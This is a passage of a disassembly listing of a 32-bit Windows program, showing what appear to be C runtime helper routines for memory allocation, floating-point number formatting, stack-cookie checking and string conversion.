loc_417D79: ; CODE XREF: sub_417CF5+3F�j
inc esi
jmp short loc_417D15
; ---------------------------------------------------------------------------
loc_417D7C: ; CODE XREF: sub_417CF5+79�j
mov edi, eax
jmp short loc_417DE1
; ---------------------------------------------------------------------------
loc_417D80: ; CODE XREF: sub_417CF5+39�j
shl esi, 2
push 38h
call sub_41344D
pop ecx
mov ecx, dword_47A644
mov [esi+ecx], eax
mov eax, dword_47A644
mov eax, [esi+eax]
cmp eax, ebx
jz short loc_417DE4
push 0FA0h
add eax, 20h
push eax
call sub_41BBD8
pop ecx
pop ecx
test eax, eax
mov eax, dword_47A644
jnz short loc_417DCC
push dword ptr [esi+eax]
call sub_412FE4
pop ecx
mov eax, dword_47A644
mov [esi+eax], ebx
jmp short loc_417DE4
; ---------------------------------------------------------------------------
loc_417DCC: ; CODE XREF: sub_417CF5+C2�j
mov eax, [esi+eax]
add eax, 20h
push eax
call ds:dword_41F01C
mov eax, dword_47A644
mov edi, [esi+eax]
loc_417DE1: ; CODE XREF: sub_417CF5+89�j
mov [ebp+var_1C], edi
loc_417DE4: ; CODE XREF: sub_417CF5+29�j
; sub_417CF5+57�j ...
cmp edi, ebx
jz short loc_417DFA
mov [edi+4], ebx
mov [edi+0Ch], ebx
mov [edi+8], ebx
mov [edi], ebx
mov [edi+1Ch], ebx
or dword ptr [edi+10h], 0FFFFFFFFh
loc_417DFA: ; CODE XREF: sub_417CF5+F1�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_417E0E
mov eax, edi
call __SEH_epilog
retn
sub_417CF5 endp
; =============== S U B R O U T I N E =======================================
sub_417E0B proc near ; DATA XREF: .rdata:stru_427A50�o
mov edi, [ebp-1Ch]
sub_417E0B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_417E0E proc near ; CODE XREF: sub_417CF5+109�p
push 1
call sub_41686D
pop ecx
retn
sub_417E0E endp
; =============== S U B R O U T I N E =======================================
sub_417E17 proc near ; CODE XREF: sub_414CA3+459�p
; DATA XREF: sub_413460+1E�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_413A6E
cmp eax, 65h
jmp short loc_417E36
; ---------------------------------------------------------------------------
loc_417E2A: ; CODE XREF: sub_417E17+20�j
inc esi
movsx eax, byte ptr [esi]
push eax
call sub_41ABBC
test eax, eax
loc_417E36: ; CODE XREF: sub_417E17+11�j
pop ecx
jnz short loc_417E2A
mov al, [esi]
mov cl, byte_42D090
mov [esi], cl
inc esi
loc_417E44: ; CODE XREF: sub_417E17+38�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_417E44
pop esi
retn
sub_417E17 endp
; =============== S U B R O U T I N E =======================================
sub_417E53 proc near ; CODE XREF: sub_414CA3+46A�p
; DATA XREF: sub_413460+A�o ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push ebx
mov bl, byte_42D090
jmp short loc_417E65
; ---------------------------------------------------------------------------
loc_417E60: ; CODE XREF: sub_417E53+16�j
cmp cl, bl
jz short loc_417E6B
inc eax
loc_417E65: ; CODE XREF: sub_417E53+B�j
mov cl, [eax]
test cl, cl
jnz short loc_417E60
loc_417E6B: ; CODE XREF: sub_417E53+F�j
mov cl, [eax]
inc eax
test cl, cl
jz short loc_417E9C
jmp short loc_417E7F
; ---------------------------------------------------------------------------
loc_417E74: ; CODE XREF: sub_417E53+30�j
cmp cl, 65h
jz short loc_417E85
cmp cl, 45h
jz short loc_417E85
inc eax
loc_417E7F: ; CODE XREF: sub_417E53+1F�j
mov cl, [eax]
test cl, cl
jnz short loc_417E74
loc_417E85: ; CODE XREF: sub_417E53+24�j
; sub_417E53+29�j
mov edx, eax
loc_417E87: ; CODE XREF: sub_417E53+38�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_417E87
cmp [eax], bl
jnz short loc_417E92
dec eax
loc_417E92: ; CODE XREF: sub_417E53+3C�j
; sub_417E53+47�j
mov cl, [edx]
inc eax
inc edx
test cl, cl
mov [eax], cl
jnz short loc_417E92
loc_417E9C: ; CODE XREF: sub_417E53+1D�j
pop ebx
retn
sub_417E53 endp
; =============== S U B R O U T I N E =======================================
sub_417E9E proc near ; DATA XREF: sub_413460+28�o
; .data:off_42CE28�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
fld qword ptr [eax]
fcomp ds:dbl_427A60
fnstsw ax
test ah, 1
jnz short loc_417EB5
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_417EB5: ; CODE XREF: sub_417E9E+11�j
xor eax, eax
retn
sub_417E9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417EB8 proc near ; CODE XREF: sub_41554C+40D�p
; DATA XREF: sub_413460+14�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_8]
jz short loc_417EE1
lea eax, [ebp+var_8]
push eax
call sub_41C60D
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
leave
retn
; ---------------------------------------------------------------------------
loc_417EE1: ; CODE XREF: sub_417EB8+C�j
lea eax, [ebp+arg_0]
push eax
call sub_41C650
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
mov [eax], ecx
leave
retn
sub_417EB8 endp
; =============== S U B R O U T I N E =======================================
sub_417EF6 proc near ; CODE XREF: sub_417F13+23�p
; sub_418035+45�p ...
test edi, edi
push esi
mov esi, eax
jz short loc_417F11
push esi
call sub_416000
inc eax
push eax
push esi
add esi, edi
push esi
call sub_41BC70
add esp, 10h
loc_417F11: ; CODE XREF: sub_417EF6+5�j
pop esi
retn
sub_417EF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417F13 proc near ; CODE XREF: sub_417FC1+5B�p
; sub_418139+88�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
push esi
mov esi, eax
jz short loc_417F3C
xor eax, eax
cmp [ebp+arg_0], eax
push edi
setnle al
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
mov edi, eax
add ecx, ebx
mov eax, ecx
call sub_417EF6
pop edi
loc_417F3C: ; CODE XREF: sub_417F13+A�j
cmp dword ptr [esi], 2Dh
mov eax, ebx
jnz short loc_417F49
mov byte ptr [ebx], 2Dh
lea eax, [ebx+1]
loc_417F49: ; CODE XREF: sub_417F13+2E�j
cmp [ebp+arg_0], 0
jle short loc_417F60
lea ecx, [eax+1]
mov dl, [ecx]
mov [eax], dl
mov eax, ecx
mov cl, byte_42D090
mov [eax], cl
loc_417F60: ; CODE XREF: sub_417F13+3A�j
xor ecx, ecx
cmp [ebp+arg_8], cl
push offset dword_427A68
setz cl
add ecx, eax
add ecx, [ebp+arg_0]
push ecx
call sub_41B390
cmp [ebp+arg_4], 0
pop ecx
pop ecx
mov ecx, eax
jz short loc_417F85
mov byte ptr [ecx], 45h
loc_417F85: ; CODE XREF: sub_417F13+6D�j
mov eax, [esi+0Ch]
inc ecx
cmp byte ptr [eax], 30h
jz short loc_417FBC
mov eax, [esi+4]
dec eax
jns short loc_417F99
neg eax
mov byte ptr [ecx], 2Dh
loc_417F99: ; CODE XREF: sub_417F13+7F�j
inc ecx
cmp eax, 64h
jl short loc_417FA9
cdq
push 64h
pop esi
idiv esi
add [ecx], al
mov eax, edx
loc_417FA9: ; CODE XREF: sub_417F13+8A�j
inc ecx
cmp eax, 0Ah
jl short loc_417FB9
cdq
push 0Ah
pop esi
idiv esi
add [ecx], al
mov eax, edx
loc_417FB9: ; CODE XREF: sub_417F13+9A�j
add [ecx+1], al
loc_417FBC: ; CODE XREF: sub_417F13+79�j
mov eax, ebx
pop esi
pop ebp
retn
sub_417F13 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417FC1 proc near ; CODE XREF: sub_4181D9+47�p
var_2C = byte ptr -2Ch
var_14 = dword ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_42CE38
xor eax, [ebp+4]
push ebx
mov [ebp+var_4], eax
push esi
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+4]
push dword ptr [eax]
call sub_41C7C4
mov esi, [ebp+arg_8]
mov ebx, [ebp+arg_4]
lea eax, [ebp+var_14]
push eax
lea eax, [esi+1]
push eax
xor eax, eax
cmp [ebp+var_14], 2Dh
mov edx, ebx
setz al
xor ecx, ecx
test esi, esi
setnle cl
add edx, eax
add ecx, edx
push ecx
call sub_41C693
push 0
push [ebp+arg_C]
lea eax, [ebp+var_14]
push esi
call sub_417F13
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 28h
pop esi
mov eax, ebx
pop ebx
call sub_4182D6
leave
retn
sub_417FC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418035 proc near ; CODE XREF: sub_4180D1+4F�p
; sub_418139+75�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, eax
mov eax, [esi+4]
dec eax
cmp [ebp+arg_8], 0
push edi
jz short loc_418062
cmp eax, [ebp+arg_4]
jnz short loc_418062
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
add ecx, eax
add ecx, [ebp+arg_0]
mov eax, ecx
mov byte ptr [eax], 30h
and byte ptr [eax+1], 0
loc_418062: ; CODE XREF: sub_418035+10�j
; sub_418035+15�j
cmp dword ptr [esi], 2Dh
mov ebx, [ebp+arg_0]
jnz short loc_41806E
mov byte ptr [ebx], 2Dh
inc ebx
loc_41806E: ; CODE XREF: sub_418035+33�j
mov eax, [esi+4]
xor edi, edi
inc edi
test eax, eax
jg short loc_418085
mov eax, ebx
call sub_417EF6
mov byte ptr [ebx], 30h
inc ebx
jmp short loc_418087
; ---------------------------------------------------------------------------
loc_418085: ; CODE XREF: sub_418035+41�j
add ebx, eax
loc_418087: ; CODE XREF: sub_418035+4E�j
cmp [ebp+arg_4], 0
jle short loc_4180C9
mov eax, ebx
call sub_417EF6
mov al, byte_42D090
mov [ebx], al
mov esi, [esi+4]
inc ebx
test esi, esi
jge short loc_4180C9
neg esi
cmp [ebp+arg_8], 0
jnz short loc_4180B0
cmp [ebp+arg_4], esi
jl short loc_4180B3
loc_4180B0: ; CODE XREF: sub_418035+74�j
mov [ebp+arg_4], esi
loc_4180B3: ; CODE XREF: sub_418035+79�j
mov edi, [ebp+arg_4]
mov eax, ebx
call sub_417EF6
push edi
push 30h
push ebx
call sub_41ADD0
add esp, 0Ch
loc_4180C9: ; CODE XREF: sub_418035+56�j
; sub_418035+6C�j
mov eax, [ebp+arg_0]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_418035 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4180D1 proc near ; CODE XREF: sub_4181D9+1E�p
var_2C = byte ptr -2Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_42CE38
xor eax, [ebp+4]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+4]
push dword ptr [eax]
call sub_41C7C4
mov esi, [ebp+arg_8]
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+var_10]
add eax, esi
push eax
xor eax, eax
cmp [ebp+var_14], 2Dh
setz al
add eax, [ebp+arg_4]
push eax
call sub_41C693
push 0
push esi
push [ebp+arg_4]
lea eax, [ebp+var_14]
call sub_418035
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
mov eax, [ebp+arg_4]
add esp, 28h
pop esi
call sub_4182D6
leave
retn
sub_4180D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418139 proc near ; CODE XREF: sub_4181D9+34�p
var_2C = byte ptr -2Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_42CE38
xor eax, [ebp+4]
push ebx
push esi
mov [ebp+var_4], eax
push edi
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+4]
push dword ptr [eax]
call sub_41C7C4
mov esi, [ebp+var_10]
mov ebx, [ebp+arg_8]
xor eax, eax
dec esi
cmp [ebp+var_14], 2Dh
setz al
add eax, [ebp+arg_4]
mov edi, eax
lea eax, [ebp+var_14]
push eax
push ebx
push edi
call sub_41C693
mov eax, [ebp+var_10]
add esp, 1Ch
dec eax
cmp esi, eax
setl cl
cmp eax, 0FFFFFFFCh
jl short loc_4181B5
cmp eax, ebx
jge short loc_4181B5
test cl, cl
jz short loc_4181A5
loc_41819B: ; CODE XREF: sub_418139+67�j
mov al, [edi]
inc edi
test al, al
jnz short loc_41819B
and [edi-2], al
loc_4181A5: ; CODE XREF: sub_418139+60�j
push 1
push ebx
push [ebp+arg_4]
lea eax, [ebp+var_14]
call sub_418035
jmp short loc_4181C6
; ---------------------------------------------------------------------------
loc_4181B5: ; CODE XREF: sub_418139+58�j
; sub_418139+5C�j
push 1
push [ebp+arg_C]
lea eax, [ebp+var_14]
push ebx
mov ebx, [ebp+arg_4]
call sub_417F13
loc_4181C6: ; CODE XREF: sub_418139+7A�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 0Ch
pop edi
pop esi
pop ebx
call sub_4182D6
leave
retn
sub_418139 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4181D9 proc near ; CODE XREF: sub_414CA3+43E�p
; DATA XREF: sub_413460�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 65h
jz short loc_418214
cmp [ebp+arg_8], 45h
jz short loc_418214
cmp [ebp+arg_8], 66h
jnz short loc_418201
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4180D1
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
loc_418201: ; CODE XREF: sub_4181D9+13�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_418139
jmp short loc_418225
; ---------------------------------------------------------------------------
loc_418214: ; CODE XREF: sub_4181D9+7�j
; sub_4181D9+D�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_417FC1
loc_418225: ; CODE XREF: sub_4181D9+39�j
add esp, 10h
pop ebp
retn
sub_4181D9 endp
; =============== S U B R O U T I N E =======================================
sub_41822A proc near ; CODE XREF: sub_413498+F�p
push 30000h
push 10000h
call sub_41C991
pop ecx
pop ecx
retn
sub_41822A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41823C proc near ; CODE XREF: sub_41827C:loc_4182A0�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld ds:dbl_427A80
fstp [ebp+var_8]
fld ds:dbl_427A78
fstp [ebp+var_10]
fld [ebp+var_10]
fdiv [ebp+var_8]
fmul [ebp+var_8]
fsubr [ebp+var_10]
fstp [ebp+var_18]
fld [ebp+var_18]
fcomp ds:dbl_427A70
fnstsw ax
test ah, 41h
jnz short loc_418278
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_418278: ; CODE XREF: sub_41823C+35�j
xor eax, eax
leave
retn
sub_41823C endp
; =============== S U B R O U T I N E =======================================
sub_41827C proc near ; CODE XREF: sub_413498+5�p
push offset aKernel32 ; "KERNEL32"
call ds:dword_41F078
test eax, eax
jz short loc_4182A0
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call ds:dword_41F074
test eax, eax
jz short loc_4182A0
push 0
call eax
retn
; ---------------------------------------------------------------------------
loc_4182A0: ; CODE XREF: sub_41827C+D�j
; sub_41827C+1D�j
jmp sub_41823C
sub_41827C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4182D6
loc_4182A5: ; CODE XREF: sub_4182D6:loc_4182DF�j
push 8
push offset stru_427EC0
call __SEH_prolog
and dword ptr [ebp-4], 0
push 0
push 1
call sub_41C9FD
pop ecx
pop ecx
jmp short loc_4182C9
; END OF FUNCTION CHUNK FOR sub_4182D6
; =============== S U B R O U T I N E =======================================
sub_4182C2 proc near ; DATA XREF: .rdata:stru_427EC0�o
xor eax, eax
inc eax
retn
sub_4182C2 endp
; ---------------------------------------------------------------------------
loc_4182C6: ; DATA XREF: .rdata:stru_427EC0�o
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_4182D6
loc_4182C9: ; CODE XREF: sub_4182D6-16�j
or dword ptr [ebp-4], 0FFFFFFFFh
push 3
call ds:dword_41F02C
int 3 ; Trap to Debugger
; END OF FUNCTION CHUNK FOR sub_4182D6
; =============== S U B R O U T I N E =======================================
sub_4182D6 proc near ; CODE XREF: sub_413859+B4�p
; sub_414CA3+76E�p ...
; FUNCTION CHUNK AT 004182A5 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004182C9 SIZE 0000000D BYTES
cmp ecx, dword_42CE38
jnz short loc_4182DF
retn
; ---------------------------------------------------------------------------
loc_4182DF: ; CODE XREF: sub_4182D6+6�j
jmp loc_4182A5
sub_4182D6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4182E4 proc near ; CODE XREF: sub_4139A6+91�p
; sub_4190C6+C8�p ...
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push 38h
push offset stru_427ED0
call __SEH_prolog
xor ebx, ebx
cmp dword_47A018, ebx
jnz short loc_418332
push ebx
push ebx
xor esi, esi
inc esi
push esi
push offset dword_427ECC
push 100h
push ebx
call ds:dword_41F180
test eax, eax
jz short loc_41831D
mov dword_47A018, esi
jmp short loc_418332
; ---------------------------------------------------------------------------
loc_41831D: ; CODE XREF: sub_4182E4+2F�j
call ds:dword_41F008
cmp eax, 78h
jnz short loc_418332
mov dword_47A018, 2
loc_418332: ; CODE XREF: sub_4182E4+14�j
; sub_4182E4+37�j ...
cmp [ebp+arg_C], ebx
jle short loc_418352
mov ecx, [ebp+arg_C]
mov eax, [ebp+arg_8]
loc_41833D: ; CODE XREF: sub_4182E4+61�j
dec ecx
cmp [eax], bl
jz short loc_41834A
inc eax
cmp ecx, ebx
jnz short loc_41833D
or ecx, 0FFFFFFFFh
loc_41834A: ; CODE XREF: sub_4182E4+5C�j
or eax, 0FFFFFFFFh
sub eax, ecx
add [ebp+arg_C], eax
loc_418352: ; CODE XREF: sub_4182E4+51�j
mov eax, dword_47A018
cmp eax, 2
jz loc_41853C
cmp eax, ebx
jz loc_41853C
cmp eax, 1
jnz loc_41856F
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_20], ebx
mov [ebp+var_24], ebx
cmp [ebp+arg_18], ebx
jnz short loc_418389
mov eax, dword_47A188
mov [ebp+arg_18], eax
loc_418389: ; CODE XREF: sub_4182E4+9B�j
push ebx
push ebx
push [ebp+arg_C]
push [ebp+arg_8]
xor eax, eax
cmp [ebp+arg_1C], ebx
setnz al
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_18]
call ds:dword_41F0A8
mov esi, eax
mov [ebp+var_28], esi
cmp esi, ebx
jz loc_41856F
mov [ebp+ms_exc.disabled], 1
lea eax, [esi+esi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_412DD0
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_2C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_4183F5
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_41AE30
xor ebx, ebx
mov [ebp+var_2C], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_1C]
mov esi, [ebp+var_28]
loc_4183F5: ; CODE XREF: sub_4182E4+F4�j
cmp [ebp+var_2C], ebx
jnz short loc_418416
lea eax, [esi+esi]
push eax
call sub_41344D
pop ecx
mov [ebp+var_2C], eax
cmp eax, ebx
jz loc_41856F
mov [ebp+var_20], 1
loc_418416: ; CODE XREF: sub_4182E4+114�j
push esi
push [ebp+var_2C]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call ds:dword_41F0A8
test eax, eax
jz loc_418519
push ebx
push ebx
push esi
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41F180
mov edi, eax
mov [ebp+var_1C], edi
cmp edi, ebx
jz loc_418519
test byte ptr [ebp+arg_4+1], 4
jz short loc_418485
cmp [ebp+arg_14], ebx
jz loc_418519
cmp edi, [ebp+arg_14]
jg loc_418519
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41F180
jmp loc_418519
; ---------------------------------------------------------------------------
loc_418485: ; CODE XREF: sub_4182E4+172�j
mov [ebp+ms_exc.disabled], 2
lea eax, [edi+edi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_412DD0
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_30], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_4184C3
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_41AE30
xor ebx, ebx
mov [ebp+var_30], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_1C]
mov esi, [ebp+var_28]
loc_4184C3: ; CODE XREF: sub_4182E4+1C2�j
cmp [ebp+var_30], ebx
jnz short loc_4184E0
lea eax, [edi+edi]
push eax
call sub_41344D
pop ecx
mov [ebp+var_30], eax
cmp eax, ebx
jz short loc_418519
mov [ebp+var_24], 1
loc_4184E0: ; CODE XREF: sub_4182E4+1E2�j
push edi
push [ebp+var_30]
push esi
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41F180
test eax, eax
jz short loc_418519
push ebx
push ebx
cmp [ebp+arg_14], ebx
jnz short loc_418503
push ebx
push ebx
jmp short loc_418509
; ---------------------------------------------------------------------------
loc_418503: ; CODE XREF: sub_4182E4+219�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_418509: ; CODE XREF: sub_4182E4+21D�j
push edi
push [ebp+var_30]
push ebx
push [ebp+arg_18]
call ds:dword_41F0AC
mov edi, eax
loc_418519: ; CODE XREF: sub_4182E4+149�j
; sub_4182E4+168�j ...
cmp [ebp+var_24], ebx
jz short loc_418527
push [ebp+var_30]
call sub_412FE4
pop ecx
loc_418527: ; CODE XREF: sub_4182E4+238�j
cmp [ebp+var_20], ebx
jz short loc_418535
push [ebp+var_2C]
call sub_412FE4
pop ecx
loc_418535: ; CODE XREF: sub_4182E4+246�j
mov eax, edi
jmp loc_418697
; ---------------------------------------------------------------------------
loc_41853C: ; CODE XREF: sub_4182E4+76�j
; sub_4182E4+7E�j
mov [ebp+var_34], ebx
xor edi, edi
mov [ebp+var_38], ebx
cmp [ebp+arg_0], ebx
jnz short loc_418551
mov eax, dword_47A178
mov [ebp+arg_0], eax
loc_418551: ; CODE XREF: sub_4182E4+263�j
cmp [ebp+arg_18], ebx
jnz short loc_41855E
mov eax, dword_47A188
mov [ebp+arg_18], eax
loc_41855E: ; CODE XREF: sub_4182E4+270�j
push [ebp+arg_0]
call sub_41CB47
pop ecx
mov [ebp+var_3C], eax
cmp eax, 0FFFFFFFFh
jnz short loc_418576
loc_41856F: ; CODE XREF: sub_4182E4+87�j
; sub_4182E4+CD�j ...
xor eax, eax
jmp loc_418697
; ---------------------------------------------------------------------------
loc_418576: ; CODE XREF: sub_4182E4+289�j
cmp eax, [ebp+arg_18]
jz loc_41866D
push ebx
push ebx
lea ecx, [ebp+arg_C]
push ecx
push [ebp+arg_8]
push eax
push [ebp+arg_18]
call sub_41CB90
add esp, 18h
mov [ebp+var_34], eax
cmp eax, ebx
jz short loc_41856F
push ebx
push ebx
push [ebp+arg_C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41F17C
mov esi, eax
mov [ebp+var_40], esi
cmp esi, ebx
jz loc_41865C
mov [ebp+ms_exc.disabled], ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_412DD0
mov [ebp+ms_exc.old_esp], esp
mov edi, esp
mov [ebp+var_44], edi
push esi
push ebx
push edi
call sub_41ADD0
add esp, 0Ch
jmp short loc_4185ED
; ---------------------------------------------------------------------------
loc_4185DD: ; DATA XREF: .rdata:stru_427ED0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4185E1: ; DATA XREF: .rdata:stru_427ED0�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41AE30
xor ebx, ebx
xor edi, edi
loc_4185ED: ; CODE XREF: sub_4182E4+2F7�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
cmp edi, ebx
jnz short loc_418618
push [ebp+var_40]
call sub_41344D
pop ecx
mov edi, eax
cmp edi, ebx
jz short loc_418635
push [ebp+var_40]
push ebx
push edi
call sub_41ADD0
add esp, 0Ch
mov [ebp+var_38], 1
loc_418618: ; CODE XREF: sub_4182E4+30F�j
push [ebp+var_40]
push edi
push [ebp+arg_C]
push [ebp+var_34]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41F17C
mov [ebp+var_40], eax
cmp eax, ebx
jnz short loc_418639
loc_418635: ; CODE XREF: sub_4182E4+31E�j
xor esi, esi
jmp short loc_41865F
; ---------------------------------------------------------------------------
loc_418639: ; CODE XREF: sub_4182E4+34F�j
push [ebp+arg_14]
push [ebp+arg_10]
lea eax, [ebp+var_40]
push eax
push edi
push [ebp+arg_18]
push [ebp+var_3C]
call sub_41CB90
add esp, 18h
mov esi, eax
neg esi
sbb esi, esi
neg esi
jmp short loc_41865F
; ---------------------------------------------------------------------------
loc_41865C: ; CODE XREF: sub_4182E4+2D0�j
mov esi, [ebp+var_48]
loc_41865F: ; CODE XREF: sub_4182E4+353�j
; sub_4182E4+376�j
cmp [ebp+var_38], ebx
jz short loc_418687
push edi
call sub_412FE4
pop ecx
jmp short loc_418687
; ---------------------------------------------------------------------------
loc_41866D: ; CODE XREF: sub_4182E4+295�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41F17C
mov esi, eax
loc_418687: ; CODE XREF: sub_4182E4+37E�j
; sub_4182E4+387�j
cmp [ebp+var_34], ebx
jz short loc_418695
push [ebp+var_34]
call sub_412FE4
pop ecx
loc_418695: ; CODE XREF: sub_4182E4+3A6�j
mov eax, esi
loc_418697: ; CODE XREF: sub_4182E4+253�j
; sub_4182E4+28D�j
lea esp, [ebp-54h]
call __SEH_epilog
retn
sub_4182E4 endp
; =============== S U B R O U T I N E =======================================
sub_4186A0 proc near ; CODE XREF: sub_418C87+138�p
arg_0 = dword ptr 4
mov eax, [esi+4]
test eax, eax
jz short loc_4186EB
lea edx, [eax+8]
cmp byte ptr [edx], 0
jz short loc_4186EB
mov ecx, [edi+4]
cmp eax, ecx
jz short loc_4186C6
add ecx, 8
push ecx
push edx
call sub_41B4E0
test eax, eax
pop ecx
pop ecx
jnz short loc_4186E8
loc_4186C6: ; CODE XREF: sub_4186A0+14�j
test byte ptr [edi], 2
jz short loc_4186D0
test byte ptr [esi], 8
jz short loc_4186E8
loc_4186D0: ; CODE XREF: sub_4186A0+29�j
mov eax, [esp+arg_0]
mov eax, [eax]
test al, 1
jz short loc_4186DF
test byte ptr [esi], 1
jz short loc_4186E8
loc_4186DF: ; CODE XREF: sub_4186A0+38�j
test al, 2
jz short loc_4186EB
test byte ptr [esi], 2
jnz short loc_4186EB
loc_4186E8: ; CODE XREF: sub_4186A0+24�j
; sub_4186A0+2E�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4186EB: ; CODE XREF: sub_4186A0+5�j
